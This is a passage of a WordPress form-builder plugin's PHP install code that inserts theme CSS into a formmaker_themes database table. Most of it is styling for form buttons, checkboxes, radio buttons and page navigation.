display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #C0C0C0;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #A8A8A8;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(17, \'Theme 05 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #0E7297;\r\nborder: 1px solid #A0CBDB;\r\nmargin-bottom: 10px;\r\ncolor: #A0CBDB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/01/nextbg_hover.png) url([SITE_ROOT]/images/05/01/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/01/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #A0CBDB;\r\n	padding:15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #006A91;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\ncolor: #3F3F3F;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 